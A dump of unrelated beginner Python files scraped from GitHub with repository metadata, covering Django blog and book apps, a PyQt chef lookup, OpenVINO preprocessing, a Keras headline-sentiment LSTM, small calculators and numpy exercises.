"noreply@github.com"
] | noreply@github.com |
678afcc0724c6f5ef1b5f4ed3a8f9fc6b59d5a11 | 26418ec10db11fcce0acdaaef8b01ff7576f5584 | /secondproject/urls.py | 4d799338e0d990f74b918fe015e57b9052b3f188 | [] | no_license | yeeunee/real_blog | bc949e04aa84023e8d53d1f60450ea38520c2806 | 1487054a87ac215b5ef13e0ab5ad6f1d2b84e6ef | refs/heads/master | 2020-04-28T15:04:03.569158 | 2019-03-13T06:21:26 | 2019-03-13T06:21:26 | 175,358,629 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 817 | py | """secondproject URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
import blog.views
# URL routes: Django admin at /admin/, the blog home view at the site root.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('', blog.views.home, name="home"),
]
| [
"sentirector@gmail.com"
] | sentirector@gmail.com |
9681b96bcbfa23482456f66a61a1679fa4b8b4c4 | a2ecfcd9f51c00b8836c0357f6b7b8482733e544 | /src/finetune_scripts/transformer_models.py | c40fda94ee5c5029f05bbcdb29e1b584df410598 | [] | no_license | Enniwhere/airbnb-sentiment-vis | 03e98787a21a11ef819f740981b4edd17b2ad0ae | 09a415061112e9c69675f1181902906e31e430de | refs/heads/master | 2021-05-20T02:03:00.421021 | 2020-04-20T08:59:48 | 2020-04-20T08:59:48 | 252,139,245 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 129 | py | version https://git-lfs.github.com/spec/v1
oid sha256:a84bdd75aacb61d69f63c11f9c449eef2bd07881c00fddb82d76e7ca98bf5b7b
size 3802
| [
"enni@cs.au.dk"
] | enni@cs.au.dk |
0cfe6683a4fd0a381b62f6da4647e3531099d53e | f1bc74572c5e93d3a8d40aaec47f36af7dfba2ee | /prototype/Tuna/myvenv/Scripts/django-admin.py | de343c74f429c717d2d4c1fb2a0d80ab273a088d | [] | no_license | jbnulastproject/ant_front | d0f85a3b203a05a6a40fb9b804206baf0f9ad8f5 | 379b41a3c1246648ad6faa2fad6b8df83dc4f6c5 | refs/heads/master | 2020-11-30T12:26:06.176588 | 2019-12-29T13:10:19 | 2019-12-29T13:10:19 | 230,396,608 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 181 | py | #!c:\users\user\desktop\ant_front\prototype\tuna\myvenv\scripts\python.exe
from django.core import management
# venv-generated console script: delegate to Django's command-line dispatcher.
if __name__ == "__main__":
    management.execute_from_command_line()
| [
"rudals901@gmail.com"
] | rudals901@gmail.com |
1de8c0a0efc4e8cbd1f338c8f43f5c4b19e5dc87 | 0ccede4589d755393f28f48d9ee3e4e1f95cb68c | /django/django_fullstack/Favorite_Books/favbook_app/models.py | 2255b73353fc6d9e77c06a59f55f64da64eeb306 | [] | no_license | mezoswn/python-stack | 766caa92a13160dab9a3649ffffb26375735715c | e12e82bc3aaaaa0e9cb4314da3c391006c7e08fc | refs/heads/master | 2023-05-08T00:24:02.863567 | 2021-05-31T01:59:53 | 2021-05-31T01:59:53 | 364,519,735 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,961 | py | from django.db import models
from time import localtime, strftime
import re
from django.db.models.deletion import CASCADE
class BlogManager(models.Manager):
    """Manager providing form-validation helpers for User records."""

    def basic_validator(self, postData):
        """Validate registration data; return {field: error message} (empty when valid)."""
        errors = {}
        EMAIL_REGEX = re.compile(r'^[a-zA-Z0-9.+_-]+@[a-zA-Z0-9._-]+\.[a-zA-Z]+$')
        lisOfEmails = User.objects.filter(email=postData['email'])
        if not EMAIL_REGEX.match(postData['email']):  # test whether a field matches the pattern
            errors['email'] = "Invalid email address!"
        if len(lisOfEmails):
            errors['email'] = "Email is already registered"
        # add keys and values to errors dictionary for each invalid field
        if len(postData['firstname']) < 2:
            errors["firstname"] = "User first should be at least 2 characters"
        if len(postData['lastname']) < 2:
            errors["lastname"] = "User Last name should be at least 2 characters"
        if len(postData['passwd']) < 8:
            errors["passwd"] = "User Password should be at least 8 characters"
        # Bug fix: the original compared the date strings field-by-field with
        # nested '<=' checks (wrong for most dates) and computed "age" as
        # year+month+day minus year+month+day, which is not an age at all.
        # Use real calendar arithmetic; error keys and messages are unchanged.
        from datetime import date
        postTime = postData['birth_date']  # expected "YYYY-MM-DD"
        if postTime:
            year, month, day = (int(part) for part in postTime.split("-"))
            born = date(year, month, day)
            today = date.today()
            if born > today:
                errors["birth_date"] = "You are not born yet!!!"
            else:
                # Age in whole years, decremented if this year's birthday
                # has not happened yet.
                age = today.year - born.year - (
                    (today.month, today.day) < (born.month, born.day)
                )
                if age < 13:
                    errors["Age"] = "Sorry Your Age less than 13 !" + str(age)
        return errors

    def login_Validator(self, postData):
        """Validate login data; return {field: error message}."""
        errors2 = {}
        if len(postData['loginemail']) == 0:
            errors2["loginemail"] = "Please enter Valid email or Password to login "
        if len(postData['loginpass']) == 0:
            errors2["loginpass"] = "Please enter Valid email or Password to login "
        # NOTE(review): these querysets are built but never evaluated or
        # inspected; Django querysets are lazy, so they currently have no
        # effect. Kept pending the (presumably intended) credential check.
        lisOfEmails = User.objects.filter(email=postData['loginemail'])
        lisOfPassword = User.objects.filter(passwod=postData['loginpass'])
        return errors2
class User(models.Model):
    # Registered site user. Note: the password column is (mis)spelled
    # 'passwod' in the schema; renaming it would require a migration plus
    # updates to every caller (login_Validator filters on it), so it is
    # documented rather than changed here.
    first_name = models.CharField(max_length=255)
    last_name = models.CharField(max_length=255)
    email = models.EmailField(max_length=255)
    passwod = models.CharField(max_length=255)
    dateOfBirth = models.DateField(null=True, verbose_name='Date of Birth')
    # Custom manager exposing basic_validator / login_Validator.
    objects = BlogManager()
class Book(models.Model):
    # A book uploaded by one user; any number of users can "like" it.
    title = models.CharField(max_length=255)
    desc = models.TextField()
    # Deleting the uploader also deletes their uploaded books (CASCADE).
    uploaded_by = models.ForeignKey(User , related_name="books_uploaded",on_delete=CASCADE)
    users_who_like = models.ManyToManyField(User,related_name="liked_books" )
| [
"m.sweidan@hotmail.com"
] | m.sweidan@hotmail.com |
b3e93972753af0b81f60866b5810dda48c085e27 | d2f4aba8f2bae909267a7e19af30355277f51266 | /jd_spider/information_summary_filter/__init__.py | f294a8e80324feea507629ebdaaf6fbaa5b09bf9 | [] | no_license | msechen/jdpor | 24cb315a76bbd6c92d1f4bbc3100960aac328491 | af89f0d420b55648b244fcb64802beff783af28e | refs/heads/master | 2023-03-18T19:04:10.133701 | 2020-06-19T05:52:09 | 2020-06-19T05:52:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,684 | py | # 基于redis的存储
import hashlib
import six
class BaseFilter(object):
    """Base class for de-duplication filters keyed on a hash of the data.

    Subclasses implement _get_storage/_save/_is_exists against a concrete
    backend (e.g. Redis, using the connection settings accepted here).
    """

    def __init__(self,
                 hash_func_name="md5",
                 redis_host='localhost',
                 redis_port=6379,
                 redis_db=0,
                 redis_key='boss',
                 ):
        self.redis_host = redis_host
        self.redis_port = redis_port
        self.redis_db = redis_db
        self.redis_key = redis_key
        # Resolve the hashlib constructor by name (md5 digest by default).
        self.hash_func = getattr(hashlib, hash_func_name)
        self.storage = self._get_storage()

    def _get_storage(self):
        """Hook: return the backend storage handle."""
        pass

    def _safe_data(self, data):
        """Coerce *data* to a byte string on both Python 2 and 3."""
        if six.PY3:
            if isinstance(data, bytes):
                return data
            if isinstance(data, str):
                return data.encode()
            raise Exception('请提供一个字符串')
        if isinstance(data, str):
            return data
        if isinstance(data, unicode):
            return data.encode()
        raise Exception('请提供一个字符串')

    def _get_hash_value(self, data):
        """Return the hex digest fingerprint of *data*."""
        digest = self.hash_func()
        digest.update(self._safe_data(data))
        return digest.hexdigest()

    def save(self, data):
        """Record *data*'s fingerprint; returns the backend's result."""
        return self._save(self._get_hash_value(data))

    def _save(self, hash_value):
        """Hook: persist *hash_value* in the backend."""
        pass

    def is_exists(self, data):
        """Return whether *data*'s fingerprint has been seen before."""
        return self._is_exists(self._get_hash_value(data))

    def _is_exists(self, hash_value):
        """Hook: look up *hash_value* in the backend."""
        pass
| [
"2521815745@qq.com"
] | 2521815745@qq.com |
25a56b9668be160cc2d3f1113f3f44564b46c9fe | 356151747d2a6c65429e48592385166ab48c334c | /backend/manager/threads/manage_chef/th_remove_chef_query.py | ea0d3f08d872c0edeeb0b8a88499869306d0296d | [] | no_license | therealrahulsahu/se_project | c82b2d9d467decd30a24388f66427c7805c23252 | c9f9fd5594191ab7dce0504ca0ab3025aa26a0c1 | refs/heads/master | 2020-06-25T02:51:30.355677 | 2020-04-20T13:01:36 | 2020-04-20T13:01:36 | 199,175,627 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,371 | py | from PyQt5.QtCore import QThread, pyqtSignal
class ThreadRemoveChefQuery(QThread):
    """Background thread that looks up chefs by name for the "remove chef"
    dialog, so the MongoDB query runs off the UI thread."""
    # Emitted with True once a non-empty result list has been fetched.
    signal = pyqtSignal('PyQt_PyObject')
    def __init__(self, parent_class):
        super().__init__()
        self.output_list = []             # chef _id values from the last query
        self.parent_class = parent_class  # widget owning the input field and buttons
    def run(self):
        # Case-insensitive substring match on whatever the user typed.
        in_name = r'(?i){}'.format(self.parent_class.curr_wid.le_rm_chef.text().strip())
        self.output_list = []
        # NOTE(review): "itmes" is a typo for "items"; renaming would require
        # updating every reader of this attribute elsewhere in the project.
        self.output_itmes = []
        from errors import ChefNotFoundError
        from pymongo.errors import AutoReconnect
        try:
            myc = self.parent_class.MW.DB.chef
            # At most 10 matches; password/phone excluded from the projection.
            data_list = list(myc.find({'name': {'$regex': in_name}},
                                      {'password': 0, 'phone': 0}).limit(10))
            if data_list:
                self.output_itmes = data_list
                self.output_list = [x['_id'] for x in data_list]
                self.parent_class.MW.mess('List Fetched')
                self.signal.emit(True)
            else:
                # No match: keep the confirm button disabled and report it.
                self.parent_class.curr_wid.bt_rm_confirm.setEnabled(False)
                raise ChefNotFoundError
        except ChefNotFoundError as ob:
            self.parent_class.MW.mess(str(ob))
        except AutoReconnect:
            self.parent_class.MW.mess('-->> Network Error <<--')
        finally:
            # Always re-enable the search button, whatever happened above.
            self.parent_class.curr_wid.bt_get_rm_chef.setEnabled(True)
| [
"43601158+therealrahulsahu@users.noreply.github.com"
] | 43601158+therealrahulsahu@users.noreply.github.com |
a8e8716ec163600523b8424e9c8d0f4011d3dd2d | 35db4ed134393a8ff06469f5155d4cc9c61d396f | /calculator.py | 1831e002968e61376bc50122a7d4b76df635544f | [] | no_license | kjrashmi20/python_class | 6e2595b40146e530de426019923352e9905b910f | 91b42aadd8f8e1aadb5abaf431fcabdb1cf489a5 | refs/heads/master | 2020-03-31T05:18:36.332992 | 2018-11-24T13:35:57 | 2018-11-24T13:35:57 | 151,941,067 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 986 | py | while True:
print("1:Do you want to add two numbers ?")
print("2:Do you want to subtract two numbers?")
print("3:Do you want to multiply two numbers?")
print("4:Do you want to divide two numbers?")
print("5: Exit program")
a=int(input("Select option"))
if a==1:
add=int(input("Enter first number"))
add1=int(input("Enter second number"))
result=add+add1
print(result)
elif a==2:
sub=int(input("Enter first number"))
sub1=int(input("Enter second number"))
result=sub-sub1
print(result)
elif a==3:
mul = int(input("Enter first number"))
mul1 = int(input("Enter second number"))
result = mul*mul1
print(result)
elif a==4:
div = int(input("Enter first number"))
div1 = int(input("Enter second number"))
result = div/div1
print(result)
elif a==5:
print("Exiting the program, Thank you!")
break;
| [
"rashmikj1992@gmail.com"
] | rashmikj1992@gmail.com |
6c160a23807d2b6a1341c5701099e507cfeaf14e | 668f9da3e30d63cf4475cd922981def446551014 | /lesson_2/exercise_13/preprocess_inputs.py | 178b3f817437a3fe3019406f5f6e2a98ee8e23f8 | [] | no_license | melitus/intel_openvino | b14322aa6f8261ade55b8c1177152c7dd32f26ea | 7d64349c2110e4b364a49941a6f7d19401d21217 | refs/heads/master | 2020-12-13T20:07:18.363860 | 2020-02-14T15:46:27 | 2020-02-14T15:46:27 | 234,518,382 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,763 | py | import cv2
import numpy as np
#note: check the pre-trained model's input shape, e.g. shape: [1x3x256x456] = [BxCxHxW]
#B - batch size, C - number of channels, H - image height, W - image width
#syntax: cv2.resize(input_image, (width, height)) takes width first, whereas reshape() takes height before width, one dimension at a time
#width counts horizontal pixels and height counts vertical pixels on screen. Think of a television screen: the horizontal (x-axis) pixel count is larger than the vertical (y-axis) count
#https://docs.openvinotoolkit.org/latest/_models_intel_human_pose_estimation_0001_description_human_pose_estimation_0001.html
#before the width and height there is one slot each for the batch and channel dimensions
def preprocessing(input_image, height, width):
    """Resize an image and repack it as a [1, 3, H, W] network input blob."""
    # cv2.resize expects (width, height); the result is still H x W x C.
    resized = cv2.resize(input_image, (width, height))
    # HWC -> CHW: move the channel axis to the front, as the models expect.
    chw = resized.transpose((2, 0, 1))
    # Prepend the batch dimension: [B=1, C=3, H, W].
    return chw.reshape(1, 3, height, width)
def pose_estimation(input_image):
    """Preprocess ``input_image`` for the pose estimation model.

    Per the linked human-pose-estimation-0001 description, the network
    expects a [1, 3, 256, 456] blob, so the frame is resized to 456x256
    and repacked channels-first with a batch dimension.
    """
    frame = np.copy(input_image)
    return preprocessing(frame, 256, 456)
def text_detection(input_image):
    """Preprocess ``input_image`` for the text detection model.

    The network input is a [1, 3, 768, 1280] blob, i.e. a 1280x768 frame
    repacked channels-first with a batch dimension.
    """
    frame = np.copy(input_image)
    return preprocessing(frame, 768, 1280)
def car_meta(input_image):
    """Preprocess ``input_image`` for the car metadata model.

    The network input is a [1, 3, 72, 72] blob, i.e. a 72x72 frame
    repacked channels-first with a batch dimension.
    """
    frame = np.copy(input_image)
    return preprocessing(frame, 72, 72)
"asmelitus@gmail.com"
] | asmelitus@gmail.com |
bd1648e753b21f488e833b19647f1e0cccd7604d | 15fa84d9f3250537dcda5117275bf56ec9ad99dd | /project/apps/core/migrations/0001_initial.py | bafc2d596978c660322f2beb83d8fac0ccfc97d9 | [] | no_license | danbeggan/contextualised-server | 4425f085b2602bc1fa30925d883190f82983e8a0 | 6f0811e00b672b4a6aa312e0d69ab5a8e6a1b923 | refs/heads/master | 2021-01-17T22:36:48.573581 | 2017-10-26T14:54:47 | 2017-10-26T14:54:47 | 84,200,508 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,382 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.12 on 2017-02-26 13:13
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema for the ``core`` app: Disambigauation and Search tables.

    NOTE(review): auto-generated by Django; hand edits are unusual here. The
    model name 'Disambigauation' (sic) is misspelled, but renaming it needs a
    follow-up migration, not an edit to this file.
    """
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='Disambigauation',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('synset', models.CharField(max_length=40)),
                ('definition', models.TextField()),
            ],
            options={
                'verbose_name': 'Disambigauation',
                'verbose_name_plural': 'Disambigauations',
            },
        ),
        migrations.CreateModel(
            name='Search',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('term', models.CharField(max_length=80)),
                ('paragraph', models.TextField()),
                # Each search references the chosen disambiguation; deleting it cascades.
                ('disambigauation', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='core.Disambigauation')),
            ],
            options={
                'verbose_name': 'Search',
                'verbose_name_plural': 'Searches',
            },
        ),
    ]
| [
"danbeggan@gmail.com"
] | danbeggan@gmail.com |
221b36b5f091132763c293d1bd0373aa8ab7f2c8 | 7f80ea25908ce2eba6f6a72689f88c142319fe56 | /backtracking/baekjoon/2580.py | 6451fe1e80ba3457eba728de64bdc892abf909aa | [] | no_license | JUNGEEYOU/Algorithm-Problems | 1b242ae3aec3005d4e449f8b6170a63d1acac60b | 5e4a8a37254120c7c572b545d99006ebb512e151 | refs/heads/main | 2023-04-06T11:45:47.867171 | 2021-04-22T13:49:36 | 2021-04-22T13:49:36 | 353,240,130 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 633 | py | import sys
# Read the 9x9 Sudoku board from stdin, one row of 9 integers per line.
zero_list = []  # (row, col) positions of every empty cell (value 0)
arr = []        # the board itself: a list of 9 row lists
for i in range(9):
    x = list(map(int, sys.stdin.readline().split()))
    zero_list.extend([(i, j) for j in range(len(x)) if x[j] == 0])
    arr.append(x)
zero = len(zero_list)  # how many blanks must be filled
result = []  # NOTE(review): never appended to anywhere in the visible chunk
def dfs():
    """Backtracking step for the Sudoku solver (Baekjoon #2580).

    NOTE(review): this function appears unfinished — ``flag_x``/``flag_y``
    are computed but never used, nothing is ever added to ``result``, there
    is no recursive call despite the name, and dfs() is never invoked in the
    visible chunk.
    """
    if len(result) == zero:
        return
    # Original comment (translated from Korean): my row, my column and my
    # 3x3 box must each sum to 45.
    flag_x = False
    flag_y = False
    for x, y in zero_list:
        # Scan row x for any remaining empty cell.
        for i in arr[x]:
            if i == 0:
                flag_x = True
                break
        # Scan column y for any remaining empty cell.
        for i in range(9):
            if arr[i][y] == 0:
                flag_y = True
                break
| [
"junge2u@naver.com"
] | junge2u@naver.com |
0a1105cc825c055ce865b8c5c5f61fe56a6ff4c9 | 1670cc30dbe1ee193889cbd1d4944cefb296b441 | /compareDataSet.py | 61d0ba62f9635e3f5c9a4345fc523029a54667f4 | [] | no_license | RaghavendraTA/TestingTool | 11dbca023a8271e9c941f6c398c570895d78afbe | ee2a9de483c5570bbcb4ddecea1d69cd7b7461d1 | refs/heads/master | 2020-12-03T01:56:18.932925 | 2019-06-25T13:16:13 | 2019-06-25T13:16:13 | 95,880,866 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,720 | py | import operator
class ExcelGenerator:
def push(self, alist, counter):
print(alist, end=' -> ')
def color(self, counter, cells):
print(cells)
def compareDataSet(leftData, rightData, ExcelCounter):
    """Diff two record sets keyed on each record's second field (item[1]).

    Records present on both sides are compared field-by-field and the
    mismatching cell indices are reported; records present on one side only
    are reported whole.  Output goes through ExcelGenerator (currently a
    console stub).  ``ExcelCounter`` is the starting output-row number.
    """
    # Index both sides by the value in column 1 (assumed unique per side).
    leftMap = {}
    rightMap = {}
    for item in leftData:
        leftMap[item[1]] = item
    for item in rightData:
        rightMap[item[1]] = item
    cells = list()  # indices of mismatching cells for the current record pair
    # Remove
    # 0 = emit left rows only, 1 = right rows only, 2 = both sides.
    additional_info = 2
    exg = ExcelGenerator()
    # Keys present on both sides: compare the two records element-wise.
    keys = set(leftMap.keys()).intersection(rightMap.keys())
    for key in keys:
        lefti = leftMap[key].copy()
        righti = rightMap[key].copy()
        j = 0
        while len(lefti) > 0 and len(righti) > 0:
            ls = lefti.pop(0)
            rs = righti.pop(0)
            if (ls != rs):
                cells.append(j)
            j += 1
        # Leftover fields (records of unequal length) all count as mismatches.
        cells += [i for i in range(j, j + len(lefti))]
        cells += [i for i in range(j, j + len(righti))]
        del lefti
        del righti
        if len(cells) > 0:
            if additional_info == 0 or additional_info == 2:
                exg.push(leftMap[key], ExcelCounter)
                exg.color(ExcelCounter, cells)
                ExcelCounter += 1
            if additional_info == 1 or additional_info == 2:
                exg.push(rightMap[key], ExcelCounter)
                exg.color(ExcelCounter, cells)
                ExcelCounter += 1
        elif False: # Discrepancy radio button selected (discrepancy_with_fullrecord == 1)
            # NOTE(review): dead branch — ``elif False`` can never run; looks
            # like a disabled feature kept for reference.
            if additional_info == 0 or additional_info == 2:
                exg.push(leftMap[key], ExcelCounter)
                ExcelCounter += 1
            if additional_info == 1 or additional_info == 2:
                exg.push(rightMap[key], ExcelCounter)
                ExcelCounter += 1
        del leftMap[key]
        del rightMap[key]
        cells.clear()
    # Records that exist on one side only: every cell index is reported.
    if additional_info == 0 or additional_info == 2:
        for key in leftMap.keys():
            cells += [j for j in range(len(leftMap[key]))]
            exg.push(leftMap[key], ExcelCounter)
            exg.color(ExcelCounter, cells)
            ExcelCounter += 1
            cells.clear()
    if additional_info == 1 or additional_info == 2:
        for key in rightMap.keys():
            cells += [j for j in range(len(rightMap[key]))]
            exg.push(rightMap[key], ExcelCounter)
            exg.color(ExcelCounter, cells)
            ExcelCounter += 1
            cells.clear()
# Demo fixtures: records are keyed on their second field (213, 132, ...).
leftData = [
    ["ABC", 213, 431, 567],
    ["ABC", 132, 435],
    ["ABC", 123, 432],
    ["RAJI", 333, 999]
]
rightData = [
    ["ABC", 132, 437],
    ["PQR", 123, 432],
    ["XYZ", 213, 438],
    ["RAGHU", 111, 999]
]
# Compare the two sets, starting output numbering at row 0.
compareDataSet(leftData, rightData, 0)
| [
"noreply@github.com"
] | noreply@github.com |
b00488bdbd576ad735be7916e04db39f869a3cf9 | 93032a4d62adf19260b8bf39ecee87c87e1c5b9c | /WEL/WEL-Random2.py | f39a797203124efb5ee033687d3648a6960f6f6b | [] | no_license | xiao666/DLMFSP | ecdfc8e6133852d62d1bfa76ad64307d5bf734bc | 68b86d6f19487c3a08f5eba06eaaeb869ad15690 | refs/heads/master | 2021-01-20T21:12:29.384697 | 2017-11-16T10:38:25 | 2017-11-16T10:38:25 | 101,756,670 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,898 | py | #text preprocessing:remove stopwords, puntuation, numbers
from nltk import word_tokenize
from nltk.corpus import stopwords
from string import punctuation
from sklearn.feature_extraction.text import CountVectorizer,HashingVectorizer
from keras.preprocessing.text import Tokenizer
from keras.preprocessing import sequence
from keras.utils import np_utils
import numpy as np
import os
import pandas as pd
from collections import Counter
from keras.layers.recurrent import LSTM
from keras.models import Sequential
from keras.layers import SpatialDropout1D
from keras.layers.core import Dense, Dropout, Activation, Lambda
from keras.layers.embeddings import Embedding
from sklearn.metrics import accuracy_score
from keras import optimizers
os.environ['TF_CPP_MIN_LOG_LEVEL']='2'  # silence TensorFlow info/warning logs
###LSTM###
#import data
# Load the combined news / DJIA dataset and split train/test by date.
data = pd.read_csv('Combined_News_DJIA.csv')
train = data[data['Date'] < '2015-01-01']
test = data[data['Date'] > '2014-12-31']
# 25 headline columns per day; pre-allocate a days x 25 grid of token lists.
headlines=[[0 for x in range(25)] for y in range(len(data.index))]#len(data.index)
# NOTE(review): this rebinds the name ``stopwords`` from the imported nltk
# corpus module to a plain set — the module is no longer reachable below.
stopwords = set(stopwords.words('english'))#+list(punctuation)
print ("num of stop words:",len(stopwords))#
#print (stopwords)
# Tokenize every headline (columns 2..26) and drop English stopwords.
for row in range(len(data.index)):#len(data.index)
    for col in range(25):
        temp0=str(data.iloc[row,(col+2)])
        temp0=temp0.lower()
        temp=HashingVectorizer().build_tokenizer()(temp0)
        #=========code below remove stopwords==================
        temp=[s for s in temp if s not in stopwords]
        headlines[row][col]=temp
#example headlines:
#"b""Georgia 'downs two Russian warplanes' as countries move to brink of war"""
#b"The commander of a Navy air reconnaissance squadron that provides the President
#and the defense secretary the airborne ability to command the nation's nuclear weapons has been relieved of duty"
print ("data shape:",data.shape)
print ("list shape:",(len(headlines),len(headlines[0])))
print (headlines[0][0])
print (headlines[0][24])
# Join each day's 25 token lists into one space-separated document string.
merged_headlines=[]
for rows in range(len(headlines)):
    temp1=[]
    for cols in range(25):
        temp1=temp1+headlines[rows][cols]
    merged_headlines.append(' '.join(word for word in temp1))
print (len(merged_headlines),len(merged_headlines[0]),len(merged_headlines[1]))#num_days,length of N0.0 string, length of NO.1 string
#1989,2181,1526
print(merged_headlines[0])
# NOTE(review): the 1611 split index is hard-coded — confirm it matches the
# date-based train/test split above (rows with Date < 2015-01-01).
merged_train=merged_headlines[0:1611]
merged_test=merged_headlines[1611:1989]
#basicvectorizer = CountVectorizer()
#basictrain = basicvectorizer.fit_transform(merged_train)
#print(basictrain.shape)
#print (basictrain[0][0])
#not removed:(1611,31675)
# --- Hyper-parameters and integer-sequence vectorization ---
max_features = 30000 #size of vocabulary 10000
maxlen = 200 #max length of sequence
#cut texts after this number of words (among top max_features most common words)
batch_size = 32
nb_classes = 2
#embeddeing_dims = #dimensions of word vector
# vectorize the text samples into a 2D integer tensor
# The filter string also strips digits, so numbers never enter the vocabulary.
tokenizer = Tokenizer(num_words=max_features,filters='!"#$%&()*+,-./:;<=>?@[\\]^_`{|}~\t\n0123456789')
tokenizer.fit_on_texts(merged_train)
print ("most occurence words:")
most_common_word=Counter(tokenizer.word_counts)
print (most_common_word.most_common(50))
sequences_train = tokenizer.texts_to_sequences(merged_train)
sequences_test = tokenizer.texts_to_sequences(merged_test)
#pad sequences to fixed length
print('Pad sequences (samples x time)')
X_train = sequence.pad_sequences(sequences_train, maxlen=maxlen)
print ("X_train.shape:",X_train.shape)
print ("X_train[0][0]:",X_train[0][0])
X_test = sequence.pad_sequences(sequences_test, maxlen=maxlen)
# Labels come from the date-based split; one-hot encode for the softmax head.
y_train = np.array(train["Label"])
y_test = np.array(test["Label"])
Y_train = np_utils.to_categorical(y_train, nb_classes)
Y_test = np_utils.to_categorical(y_test, nb_classes)
print('X_train shape:', X_train.shape)
print ("X_train[0]:",X_train[0])
print ("X_train[1]:",X_train[1])
print ("X_train[2]:",X_train[2])
print('X_test shape:', X_test.shape)
#LSTM model
# --- Build, train and evaluate a small embedding + LSTM classifier ---
print('Build model...')
model = Sequential()
print("0000000000000")
# +1 so index ``max_features`` fits: Tokenizer word indices start at 1
# (0 is reserved for padding).
model.add(Embedding(max_features+1, 128))
model.add(SpatialDropout1D(0.2))
model.add(LSTM(128,dropout=0.2, recurrent_dropout=0.2))
model.add(Dense(nb_classes))
model.add(Activation('softmax'))#softmax
model.summary()#print the model
model.compile(loss='binary_crossentropy',
              optimizer='adam',
              metrics=['accuracy'])
#'binary_crossentropy''mean_squared_error' adam
print('Train...')
model.fit(X_train, Y_train, batch_size=batch_size, epochs=3,
          validation_data=(X_test, Y_test))
score, acc = model.evaluate(X_test, Y_test,
                            batch_size=batch_size)
print('Test score:', score)
print('Test accuracy:', acc)
print("Generating test predictions...")
# NOTE(review): Sequential.predict_classes was removed in newer Keras/TF
# releases — confirm the pinned version, or switch to argmax over predict().
preds = model.predict_classes(X_test, verbose=0)
acc = accuracy_score(test['Label'], preds)
print('prediction accuracy: ', acc)
print ("percentage of rose:",sum(preds)/len(preds))
print ("end")
#os.system('pause')
"xjqxiaojianqing@vip.qq.com"
] | xjqxiaojianqing@vip.qq.com |
26126cfb3f6d2866be0b29241996ad92fe0eeee1 | e30db68eefc1c8b6f2eb7190b17ddb70b617913a | /square_num_test.py | 15ae69931d2daeaa84a3db32fa8a50f17e033035 | [] | no_license | rahulk9691/Stats_GA | 533e2f2c80f17fe4ff425db35830b42b03358620 | 6f2e051c5c2db1c7ce0e2cbe818c4657647ac953 | refs/heads/master | 2021-10-23T11:27:16.590285 | 2019-03-17T05:30:34 | 2019-03-17T05:30:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 66 | py | def square_num(num):
    # Return the square of ``num``.
    return num*num

a = 10  # NOTE(review): unused anywhere in the visible chunk
print(square_num(5))  # expected output: 25
"neosam.rahul@gmail.com"
] | neosam.rahul@gmail.com |
88bd95963c7c8bf981a85646dee3cbabf6b2601e | 69a7eba415d2c97f1d5667c37362994e8077ad53 | /numpy.py | c36b62283c6d48b9d1c4fc3971d4d9e7812c00e9 | [] | no_license | AyushAggarwal768/basic_python_programs | a03292d65314e1d914f4b4dbbadd36020de0dd13 | 279065419ed428f9b298706eec6820f863c659f1 | refs/heads/master | 2020-03-21T15:11:35.347075 | 2018-07-08T14:02:10 | 2018-07-08T14:02:10 | 138,698,927 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,055 | py | #Q.1 - Create a numpy array A of shape(10,20) and B of shape (20,25) using np.random.
#Print the matrix which is the matrix multiplication of A and B.
#The shape of the new matrix should be (10,25). Using basic numpy math functions only find the sum of all the elements of the new matrix.
import numpy as np
# A: 10x20 and B: 20x25, both filled with uniform random values.
a = np.random.rand(10, 20)
b = np.random.rand(20, 25)
# Matrix product of A and B — the result has shape (10, 25).
c = a.dot(b)
print(c)
print("Shape ->", c.shape)
print("Sum ->", np.sum(c))
#Q.2 - Create a numpy array A of shape(10,1).
#Using the basic operations of the numpy array generate an array of shape(10,1)
#such that each element is the following function applied on each element of A.
'''f(x)=1 / (1 + exp(-x))
Apply this function to each element of A and print the new array holding the value the function returns
Example:
a=[a1,a2,a3]
n(new array to be printed )=[ f(a1), f(a2), f(a3)]
'''
import numpy as np
import math
a = np.random.random((10,1))
print("Array:\n",a,"\n")
def fun(x):
    """Sigmoid: f(x) = 1 / (1 + exp(-x))."""
    return(1/(1+math.exp(-x)))
# BUG FIX: map over the scalar elements (a.ravel()) rather than the
# (1,)-shaped rows of ``a`` — calling math.exp() on a size-1 array relies on
# implicit array->scalar conversion, which is deprecated and raises an error
# on NumPy >= 1.25.  The result shape (10,) is unchanged.
b = np.array(list(map(fun, a.ravel())))
print("After mapping:\n",b)
| [
"aggarwal768projects@gmail.com"
] | aggarwal768projects@gmail.com |
